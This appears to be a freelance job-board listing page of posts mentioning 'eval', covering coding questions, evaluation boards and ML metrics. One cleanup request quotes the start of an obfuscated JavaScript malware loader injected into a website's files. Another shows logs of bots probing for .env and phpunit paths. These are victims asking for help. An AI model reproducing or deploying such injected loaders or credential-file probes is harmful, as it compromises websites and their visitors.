Espruino evalcông việc

Bộ lọc

Tìm kiếm gần đây của tôi
Lọc theo:
Ngân sách
đến
đến
đến
Loại
Nhiều kỹ năng
Ngôn ngữ
    Tình trạng công việc
    858 espruino eval công việc được tìm thấy, giá theo USD

    How can I get the code below to print obj2's variable (i.e., the data frame, df) using the eval function? The sample code is as follows: ________________________________________________________ import pandas as pd class Sample: def __init__(self): = ({'num_legs': [2, 4, 8, 0], 'num_wings': [2, 0, 0, 0], 'num_specimen_seen': [10, 2, 1, 8]}, index=['falcon', 'dog', 'spider', 'fish']) def print(self): eval("()") def main(): obj1 = Sample() obj2 = Sample() () if __name__ == '__main__': main() ______________________________________________________...

    $24 (Avg Bid)
    $24 Giá đặt trung bình
    24 lượt đặt giá
    Java eval Đã kết thúc left

    I need java code for evaulate expression based on below symbols && || () < > <= >= */+- true false floating point numbers null Sample eval expression "(true && false) || (5>2 && false || 3>=6 || true) || false"

    $16 (Avg Bid)
    $16 Giá đặt trung bình
    10 lượt đặt giá
    JavaScript eval() in Java Đã kết thúc left

    Currently My project I am using to use javascript eval(). Now I need to create same kind of function in java Below is my sample code. public class MyEvaluator { private ScriptEngine scriptEngine; public MyEvaluator() { = getScriptEngine(); } public MyStatus evaluateExpression(String expressionStr) throws ScriptException { Object stepResult = getScriptEngine().eval(expressionStr); boolean stepBoolResult = (Boolean) stepResult; return stepBoolResult ? :; } private ScriptEngine getScriptEngine() { if ( == null) { ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); = ("graal

    $102 (Avg Bid)
    $102 Giá đặt trung bình
    8 lượt đặt giá
    Project for Ibrahim E. Đã kết thúc left

    The goal of this project is to do following: 1. Find a dataset that has both RGB images with masks and LiDAR (Cloud of Points) data. 2. Train semantic segmentation model based only on RGB Images with masks + eval with mAP50 and mAP95 metric 3. Train semantic segmentation model based only on LiDAR (Cloud of Points) + eval with mAP50 and mAP95 metric 4. Make Data Fusion of point 2 and 3 + eval with mAP50 and mAP95 metric All must be working on Google ColabolatorY

    $100 (Avg Bid)
    $100 Giá đặt trung bình
    1 lượt đặt giá

    The goal of my project is to do following: 1. Find a dataset that has both RGB images with masks and LiDAR (Cloud of Points) data. 2. Train semantic segmentation model based only on RGB Images with masks + eval with mAP50 and mAP95 metric 3. Train semantic segmentation model based only on LiDAR (Cloud of Points) + eval with mAP50 and mAP95 metric 4. Make Data Fusion of point 2 and 3 + eval with mAP50 and mAP95 metric You can use any framework like e.g. but feel free to propose your own. I personally prefer forest and Yolo 8 but it is not obligatory. All must be working on Google Colabolatory In your bid please describe what your approach and data will be.

    $540 (Avg Bid)
    $540 Giá đặt trung bình
    18 lượt đặt giá
    EVAL. DESEM. OPERADOR EPH Đã kết thúc left

    Evaluación de Desempeño Operador EPH: Evaluación, Consultas, Tabulación de resultados/informe.

    $17 (Avg Bid)
    $17 Giá đặt trung bình
    1 lượt đặt giá

    ...com/tensorflow/models/blob/master/research/slim/ Currently, the accuracy information is printed to the console. Instead, I want to save that information in a text file. Code: # Print the summaries to screen. for name, value in (): summary_name = 'eval/%s' % name op = (summary_name, value, collections=[]) op = (op, [value], summary_name) tf.add_to_collection(, op) Console output: eval/Recall_5[1] eval/Accuracy[0.9775] Skills and Experience: - Strong proficiency in TensorFlow and tf-slim - Experience with modifying code in TensorFlow - Familiarity with logging accuracy metrics such as precision and recall Deadline: - The project needs to be completed within one week.

    $143 (Avg Bid)
    $143 Giá đặt trung bình
    16 lượt đặt giá

    ...al/bin /opt/homebrew/bin /opt/homebrew/sbin /usr/local/bin /System/Cryptexes/App/usr/bin /usr/bin /bin /usr/sbin /sbin /Library/Apple/usr/bin /var/run/ /var/run/ /var/run/ Contents of my .zprofile file eval "$(/opt/homebrew/bin/brew shellenv)" export ANDROID_HOME=~/Library/Android/sdk export ANDROID_SDK_ROOT=~/Library/Android/sdk export PATH $PATH:$ANDROID_HOME/tools:$ANDROID_HOME/tools/bin:$ANDROID_HOME/platform-tools export JAVA_HOME=/Library/Java/JavaVirtualMachines/ export STDUIO_JDK=JAVA_HOME Contents of my .zshrc file (added in case the .zprofile wasn't working)

    $199 (Avg Bid)
    $199 Giá đặt trung bình
    10 lượt đặt giá
    Drupal security updates Đã kết thúc left

    set the folowing: 1-Permissions Policy is a new header that allows a site to control which features and APIs can be used in the browser. 2-Content-Security-Policy This policy contains 'unsafe-inline' which is dangerous in the default-src directive. This policy contains 'unsafe-eval' which is dangerous in the default-src directive. 3-strict-origin-when-cross-origin

    $113 (Avg Bid)
    $113 Giá đặt trung bình
    6 lượt đặt giá

    I am looking for a PHP developer to help me resolve a parse error in my script. The specific error message I am receiving is "Parse error: syntax error, unexpected end of file in line X eval()'d code". I need someone with experience in PHP to identify and fix the issue. Although I haven't identified the exact location of the code issue, I am able to narrow it down. So, I would appreciate if the developer can assist me in finding and resolving the error. Ideal skills and experience for this job include: - Strong proficiency in PHP programming - Experience in troubleshooting and debugging code - Familiarity with parsing errors and syntax issues in PHP - Ability to narrow down and identify code issues

    $115 (Avg Bid)
    $115 Giá đặt trung bình
    15 lượt đặt giá

    I am looking for a freelancer who can implement a hybrid 3band ANC system in SigmaStudio on ADAU1787. Input is 2 digimics (reference and error), output to DAC. Use EVAL-ADAU1787Z as target. Desired Outcome: - Noise cancellation for specific frequencies Specific Frequencies: - The ANC system should be tuneable via SigmaStudio, allowing for customization of the targeted frequencies. ANC Filters: - The project requires the implementation of 1 ANC filter. Required Skills and Experience: - Proficiency in SigmaStudio and ADAU1787. - Experience in implementing hybrid 3band ANC systems. - Knowledge of audio signal processing and noise cancellation techniques and algorithms. - Knowledge of Digital Signal Processing.

    $504 (Avg Bid)
    $504 Giá đặt trung bình
    15 lượt đặt giá

    Primary Tasks: Regular Rating: Evaluate prompts and answers based on guidelines (3-8 mins per eval). Validation Task: Assess the accuracy of previously evaluated responses (2 mins per validation). Rewriting: Improve the clarity and coherence of given texts. Requirements: Language Proficiency: To ensure language proficiency, applicants must complete a training phase that includes an assessment of language proficiency and guidelines understanding. These questions will assess your abilities and understanding of the evaluation process. Project Scope: Evaluate written prompts and answers based on guidelines, and perform rewriting tasks. Volume: Complete as many tasks as possible within the assigned time frame. Timeline: Variable work, two to four days a week based on the volume ...

    $117 (Avg Bid)
    $117 Giá đặt trung bình
    47 lượt đặt giá

    ...visual odometry network is relatively high. The attachment is the result of DPT-VO's test on KITTI Odometry, but DPT-VO does not use neural networks to achieve visual odometry. (The reference indicators are translation error, rotation error, ATE, RPE. For example, the average ATE of ORB-SLAM2 tested on 11 sequences of kitti odometry is 26.48) (use the kitti-odom-eval tool: ). The reference metrics of semantic segmentation network is miou. (Perhaps a suitable segmentation network can be selected according to the structure of the visual odometry network) It is required to use an encoding-decoding architecture, design separate decoding networks for the two tasks and use the same encoding network (ie a structure like YOLOP)

    $38 (Avg Bid)
    $38 Giá đặt trung bình
    14 lượt đặt giá

    I am looking for a freelancer who can develop firmware for my STM32L4R9 to power on a LCD-TFT RGB display. I have the datasheet for the controller of the display and would prefer the firmware to be written in C programming language. The firmware should have basic display initiali...to be written in C programming language. The firmware should have basic display initialization functionality. Ideal skills and experience: - knowledge of C programming language - Experience in firmware development for STM32 microcontrollers - Familiarity with LCD-TFT RGB displays and their controllers - Ability to read datasheets and implement required functionality - Possession of STM32L4R9 eval board to test the fw (the display will be tested from me) - Knowledge of LVGL library to display "Hell...

    $175 (Avg Bid)
    $175 Giá đặt trung bình
    10 lượt đặt giá
    Lens Translate Eval TDT Đã kết thúc left

    Hi Rakesh S., I noticed your profile and would like to offer you my project. We can discuss any details over chat.

    $250 (Avg Bid)
    $250 Giá đặt trung bình
    1 lượt đặt giá

    ...Classifier and Optuna hyperparameter optimizatuon. For someone who knows ML this project should only take a couple of hours. Deliverable is a jupyter notebook with made up data using sklearn.datasets.make_classification with n_samples=1000, n_features=100, n_informative=10, n_redundant=2, n_repeated=0, n_classes=3, n_clusters_per_class=2, weights=[0.07, 0.90, 0.03]. Please note that Im trying to eval the minority classes, in my example -1 and 1, but make_classification may return different labels. I want to establish a relationship with a good freelancer since I might have several small problems similar to this one. ...

    $50 - $100
    Niêm phong
    $50 - $100
    4 lượt đặt giá
    Trophy icon Create a logo Đã kết thúc left

    I need a logo for my web site expert-eval automates the skills testing process, allowing you to focus on more important aspects of recruitment. Our platform generates a relevant exam and provides instant results

    $20 (Avg Bid)
    Bảo đảm
    $20
    376 bài tham dự
    Fix realtime connection DB Đã kết thúc left

    Hi, i have this problem The issue you had there was regarding DB and connection to it via sockets thats how the DB was transfering in real time infos, there was a small issue , and based on that the connection was not executed and thats why you received the disconnect and the session was cleared becase a function was using a watch with a timer on it. 91,2023/03/25 04:56:23,EVAL(1.001039 secs): {Main Loop} 92,2023/03/25 04:56:24,[/home/elf/Workspace/5p/4pServer/src/include/NetCommand/NetCommandGenerator.h:30],Deserialize Throw (16) 93,2023/03/25 04:56:24,ERROR: (null)[]11 CInBinStream::operator >> (unsigned short &UnsignedShort) 94,2023/03/25 04:56:24,[],[FATAL] OnClose 95,2023/03/25 04:56:24,Erase Socket 11 96,2023/03/25 04:56:24,TCP <0x9347908:11>: connection

    $130 (Avg Bid)
    $130 Giá đặt trung bình
    3 lượt đặt giá

    We have tested the Analog Devices ADuM4160 USB port isolator IC and the ADuM5020 DC-DC converter (using the CN0419 evaluation board) and it works very well for our application. I would like to manufacture a small run of PCBs, assembled at the board house, based on the CN0419 eval board, with some small modifications; - The switch can be replaced by a small jumper, factory-default to full speed USB - The indicator LED is not required - The USB type A plug should be on a short shielded flylead We like that the eval board has good shielding, excellent performance, test points and fixing holes for an enclosure. Can you design a suitable board based on the CN0419 design, using the ADuM4160 and 5020 and current and available components, and produce the necessary files for manuf...

    $170 (Avg Bid)
    $170 Giá đặt trung bình
    29 lượt đặt giá

    The purpose of these special population case studies is for students to work collaboratively on the application of pr...throughout the case study and in the bibliography. A reference page must be included. 5) All answers must be in complete sentences. 6) Use 12 point font with one of the following fonts: Times New Roman, Arial, or Calibri 7) All students must complete and upload a Case Study Peer Evaluation (Word document), with corresponding grades (%) of their group members, to Canvas by the due date (see peer eval instructions). • If an individual does not submit this, that individual will be deducted 5 points from their score (not the group’s score) 8) No late work will be accepted 9) Case Studies will be graded according to the criteria in the Grading Rubric (see se...

    $35 (Avg Bid)
    $35 Giá đặt trung bình
    37 lượt đặt giá
    Finish off a Wordpress Website Đã kết thúc left

    I have a wordpress website that allows customers to buy and sell items, it is integrated with escrow. The website has not been completed, i want to hire someone to evaluate the work needed to complete the website from the WP download I have. The first small job is just an eval of the website ion its current form.

    $49 (Avg Bid)
    $49 Giá đặt trung bình
    48 lượt đặt giá
    $21 Giá đặt trung bình
    16 lượt đặt giá
    Matrix Trader Instant Funded FX Đã kết thúc left

    We are launching "Matrix Trader" Instant Funded FX. We are a prop firm providing two types of funding models for our traders. “Instant Funding” and an “Eval Model” Our “INSTANT FX” is exactly that. We will provide our traders with access to instant funds to trade in the financial markets. Our “EVAL” Model is a one-step evaluation process. Pass the evaluation stage and get funded. Each model differs and will have different requirements and restrictions. Which we can elaborate more with the successful freelancer. We are looking to partner long term with the successful applicant. Who must be a creative thinker, develop imaginative and eye catching social media campaigns. So, our business stands out in a crowed soc...

    $18 / hr (Avg Bid)
    Nổi bật
    $18 / hr Giá đặt trung bình
    8 lượt đặt giá

    ...52.xxx.49.8 proxy - [11/29/2022:21:28:14 -0000] "GET /.env HTTP/1.1" 200 0 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.76.1.el7.x86_64" "-" "X-Forwarded-For: 52.xxx.49.8" 443 52.xxx.49.8 proxy - [11/29/2022:21:28:21 -0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 301 0 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.76.1.el7.x86_64" "-" "X-Forwarded-For: 52.xxx.49.8" 80 52.xxx.49.8 proxy - [11/29/2022:21:28:22 -0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 200 0 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.76.1.el7.x86_64" "-" "X-Forwarded-For: 52.xxx.49.8" 443 Quiero que s...

    $40 (Avg Bid)
    $40 Giá đặt trung bình
    2 lượt đặt giá
    Annual Performance Evaluation Đã kết thúc left

    Need to write a good annual performance eval for a acrimonious manager

    $82 (Avg Bid)
    $82 Giá đặt trung bình
    19 lượt đặt giá
    Drone Electronic speed control Đã kết thúc left

    Need to use ST Micro Cube MCSDK motor control with my eval board. I can not get pwm to work. Can you help? Not sure why it does not work. Do you have experience with it?

    $525 (Avg Bid)
    $525 Giá đặt trung bình
    17 lượt đặt giá

    I need to implement the MF-eval in the model and perform tests in matlab/simulink

    $201 (Avg Bid)
    $201 Giá đặt trung bình
    18 lượt đặt giá

    I need to implement the MF-eval in the model and perform tests

    $77 (Avg Bid)
    $77 Giá đặt trung bình
    7 lượt đặt giá
    Custom VM Assistance Đã kết thúc left

    ...as a 'real' machine (cannot be detected as virtual) to certain webapps. We will discuss this in further detail, but this will not be advanced spoofing. 3. Setup USB camera and microphone passthrough permanently (I don't want to use cmd every time I want to use the camera) 4. Virtual machine detects laptop keyboard and mouse, but not any additional plugged-in hardware. I currently have Windows 11 eval on VirtualBox and I am willing to switch to a better system if recommended. I am flexible - it can be windows 10 or 11 - but I am not willing to buy a 'full' version. If selected, we will have a short (15 minute) meeting to go over my needs. I will be present throughout the duration of the setup as needed. This is a small job, but I will tip generously if i...

    $143 (Avg Bid)
    $143 Giá đặt trung bình
    8 lượt đặt giá

    Habe seit kurzer Zeit folgende Fehlermeldung bei unserem Bestellformular: Warning: session_start(): Cannot start session when headers already sent in /homepages/htdocs/XXX/wp-content/plugins/xinsert-php/includes/shortcodes/(52) : eval()'d code on line 1 Suche jemanden mit Wordpress und Php Kenntnissen, der uns dieses, wahrscheinlich sehr kleine Problem, lösen kann. Bitte nur Freelancer aus Deutschland, die auch eine Vertraulichkeitserklärung unterzeichnen ;-) Freue mich auf Eure Antworten.

    $115 (Avg Bid)
    $115 Giá đặt trung bình
    41 lượt đặt giá

    Hi, need a python teacher who can teach an 8th grader some basic python built in functions with examples on the following; abs, bool, eval, float, int, len, max, min, range, sum. May need for 1 or 2 classes only. Will pay by the hour.

    $25 / hr (Avg Bid)
    $25 / hr Giá đặt trung bình
    34 lượt đặt giá

    ...types, which includes - All, Up to Maximum) 3. When the calc method, transfer out qty, transfer in qty are selected the qty to process will reflect appropriately will do the following: a. All calculations will be a sum of all warehouses selected in Evaluation Locs, grouped by inventoryID) Calc Methods Maximum- Will show max qty- available qty Balanced – calculates available stock to max qty % from Eval locs and applies that % to determine how much needs to get replenished for the to location so all the location have the same available stock of max % – **Exception** if the hard demand for the to loc is higher than the calculated balanced number, it will show hard demand number Transfer Out Qty Available – will calculate the difference between the available qt...

    $1081 (Avg Bid)
    $1081 Giá đặt trung bình
    24 lượt đặt giá
    DC motor controller Đã kết thúc left

    A STM32F4 eval / discovery ( such as STM32F429I-DISC1, but also similar develop board) generates a PWM to controls a H bridge to driver a DC motor. The motor includes also two hall sensors: the MCU reads pulses and drives the motor CW/CCW, following a trapeizodal speed profile (modulating the PWM duty cicle). Appling a CAN (in the following: CAN-OPEN) interface we use an external tool (such as a very simple PC interface) to communicate to the MCU how many pulses is the race of the motor. The setting up of the number of pulses, ramp slopes etc can be done via a simple PC interface (ieg Pyton or something very simple) that send via serial/USB or CAN port those parameter. This is a pilot project. The final job will be more complex and complete: this project will be updated with a CA...

    $545 (Avg Bid)
    $545 Giá đặt trung bình
    26 lượt đặt giá

    Set up Stripe payment for platform and eval period before payment is taken

    $169 (Avg Bid)
    $169 Giá đặt trung bình
    59 lượt đặt giá

    The code I have was provided to me some years back and works perfectly up to version 7.0 When I upgrade the server it throws approx 6 errors all similar to the exa...server it throws approx 6 errors all similar to the example provided: "Fatal error: Uncaught Error: Cannot use string offset as an array in /var/www/xxxxxx/(258) : eval()'d code:1 Stack trace: #0" Can you solve the following Typical error? I want to upgrade a server to PHP 7.4 but the above typical error appears when moving from version 7.0 to 7.1 onwards. Approx 6 errors exist similar to above and it happens when parsing data in an XML file. I want all errors fixed however I believe that it's the same issue that is causing them. Are you familiar with upgrading php and issues with the...

    $231 (Avg Bid)
    $231 Giá đặt trung bình
    33 lượt đặt giá

    ...com *. *. *. 'self' 'unsafe-inline' 'unsafe-eval'". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback. Issue 2: JQMIGRATE: Migrate is installed with logging active, version 3.3.2 /static/version16529…tstrap/ Issue 3: Uncaught SyntaxError: Unexpected token 'const' /static/version16529…p/ Issue 4: Uncaught SyntaxError: Unexpected token

    $164 (Avg Bid)
    $164 Giá đặt trung bình
    13 lượt đặt giá

    Programming in LabView to operate the change of channels using the EVAL-ADGS1409SDZ card, with SPI protocol on Compact-RIO hardware (.

    $47 (Avg Bid)
    $47 Giá đặt trung bình
    1 lượt đặt giá

    I can’t open my laptop Linux 64 bit I have already tried these commands $sudo fsck -Cy /dev/sdxn sudo fsck -Cy /dev/sdxn $sudo fsck /dev/sdXX sudo fsck /dev/sdXX Built-in commands: . : [ alias break cd chdir command continue echo eval exec exit export false getopts hash help history let local printf pud read readonly return set shift test times trap true type unlimit umask unalias unset wait [ [[ acpid arch ash awk basename blockdev busybox cat chmod chroot chvt clear cmp cp cut date deallocut deluser devmen df du dumpkmap echo egrep emv expr false fbset fgrep find fold fsrtim grep gunzip gzip hostname hwclock ifconfig ip kill In loadfont loankmap Is Izop mkdir mkfifo mknod mkswap mktemp modinfo more mount mv nuke openvt pidof printf ps pwd readlink reboot reset rm rmdir ru...

    $20 (Avg Bid)
    Gấp
    $20 Giá đặt trung bình
    3 lượt đặt giá

    I have written a chrome extension with its code in backbone.js + handlebars template engine. But I am having problems rendering and operating the code correctly. Specifically: 1. When code gets data from server, it doesn't render it properly in the templates. 2. Make sure data gotten from UI gets added to models properly. 3. Manifest 3 doesn't allow `eval()` function that is being used by handlebars. I need a workaround for this. If you have experience in backbone.js, I need your help on these things.

    $30 (Avg Bid)
    $30 Giá đặt trung bình
    1 lượt đặt giá

    The project is to develop an application based on FPGA development board with interfacing Analog Eval. board for processing audio signal. Here is details : H/W will be used : 1- Zynq Zedboard or MPSOC development board. 2- AD7134 dual chip AD Development board. Both boards connected by FMC LPC/HPC connector. S/W - F/W : 1- AD7134 is supported by AD and it has all firmware required to interface to many fpga board, so we can use this ready HDL/DRIVER for interfacing the AD7134 to our fpga board. 2- interfacing to PC through Ethernet with ready library "LIBIIO" or using "Matlab FPGA data capture". We have all hardware development boards on hand, can use it remotely. Any details will be discussed in details.

    $292 (Avg Bid)
    $292 Giá đặt trung bình
    7 lượt đặt giá
    May Statstistics Đã kết thúc left

    Tutoring for March in Stats eval, quizzes, and exams.

    $118 (Avg Bid)
    $118 Giá đặt trung bình
    8 lượt đặt giá
    MG Cafe 2D Blueprint Đã kết thúc left

    I need a 2D blueprint for a restaurant kitchen to be built it needs to include specs of all equipment and ventilation can you do this for me very fast I need it for the Health Dept Eval in 2 wks? I have a blueprint of the kitchen it’s a regular home kitchen that will be converted into a regulated commercial kitchen

    $175 (Avg Bid)
    $175 Giá đặt trung bình
    54 lượt đặt giá
    MySQL error on WHM Đã kết thúc left

    .../usr/local/cpanel/3rdparty/perl/532/lib/perl5/cpanel_lib/Try/ line 98 eval {...} called at /usr/local/cpanel/3rdparty/perl/532/lib/perl5/cpanel_lib/Try/ line 91 Try::Tiny::try(CODE(0x1a88878), Try::Tiny::Catch=REF(0x3821a20)) called at /usr/local/cpanel/Cpanel/Template/Plugin/ line 105 Cpanel::Template::Plugin::Mysql::mysqlversion() called at /usr/local/cpanel/Cpanel/Template/Plugin/ line 152 Cpanel::Template::Plugin::Mysql::is_version_going_eol_soon() called at /usr/local/cpanel/Cpanel/Template/Plugin/ line 134 Cpanel::Template::Plugin::Whostmgr::_get_mysql_eol_warning() called at (eval 11) line 1 eval {...} called at (eval 11) line 1 eval {...} called at (eval 11) line 1 Cpanel::Template::Shared::__ANON__(Template::Cont...

    $33 (Avg Bid)
    $33 Giá đặt trung bình
    18 lượt đặt giá
    STM32 - LORA Customization Đã kết thúc left

    STM32 knowledge: LORA-E5 C/C++ coding skills Knowledge on UART, SPI, I2C drive development Should have own STM32 eval kit or development board for testing purpose

    $1 / hr (Avg Bid)
    $1 / hr Giá đặt trung bình
    1 lượt đặt giá

    Develop a simple script interpreter / engine with IF THEN ELSE END IF AND OR + - * / < > <= >= = <> SELECT CASE ... in VBA I need to be able to interpret scripts similar to the following one with Eval(byval script as string) as variant: IF a = b or d = e THEN IF d = e AND f > g AND (h < i OR j <> k) THEN X = 10 ELSE END IF ELSEIF c = 1 THEN X = 5 END IF The script interpreter must be written in Excel VBA. Each keyword should be interpreted with its own function, so it is easy to extend the code. The script language must be VBA (IF THEN ELSE etc.). No VB-Script-Engine must be used, but the interpreter must really be programmed in VBA. The following keywords should be supported: IF THEN ELSE ELSEIF "END IF" "SELECT CASE&quo...

    $32 / hr (Avg Bid)
    $32 / hr Giá đặt trung bình
    2 lượt đặt giá

    ...additional functionality. See below. The sweep manager model shall contain: A possibility to define multiple sweep sets. A sweep set is a combinations of list- and corner sweeps where each parameter is allowed to be only used once in a sweep set, e.g. ListSweep("A", [1,2,3]) + ListSweep("B", [4,5,6]) A possibility to define certain parameter combinations that will be skipped via filter (indices or eval filter on rows - see ref. impl) Extend the model by a possibility to define parameters (defined by name, unit and default value) this should support using pre-defined parameters from the internal sweep use case that cannot be changed anymore by a user (since the test defined those parameters, users shall not be able to modify those inside TEEHouse) for ...

    $111 (Avg Bid)
    $111 Giá đặt trung bình
    6 lượt đặt giá
    ST Micro STNRG IC firmware Đã kết thúc left

    ...generate 3 interleaving PWM outputs that vary from 1% to 99% . The output percentage would vary proportionaly to a single analog input voltage that will be provided to an analog input pin on the eval board. The switching frequency will be 250 Hz. This first circuit will power up and then start putting out a set of 3 identical square waves (PWM outputs on digital pin) that are each phased 120 degrees apart. The PWM outputs will overlap and the duty cycle percentage will be proportional to an analog input voltage that is read in on one of the STNRG388 ADC input channels through one of the pins on the eval board. The second phase firmware would allow the option of converting from 3 evenly space interleaved square waves 120 degrees apart to 4 interleaved square waves 90 de...

    $216 (Avg Bid)
    $216 Giá đặt trung bình
    3 lượt đặt giá

    We have found following content in all .js files of the websites ;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','n...

    $156 (Avg Bid)
    $156 Giá đặt trung bình
    12 lượt đặt giá

    clean up the WordPress eval base64 hack Clean & Fix WordPress eval (base64_decode) PHP Hack,

    $32 (Avg Bid)
    $32 Giá đặt trung bình
    26 lượt đặt giá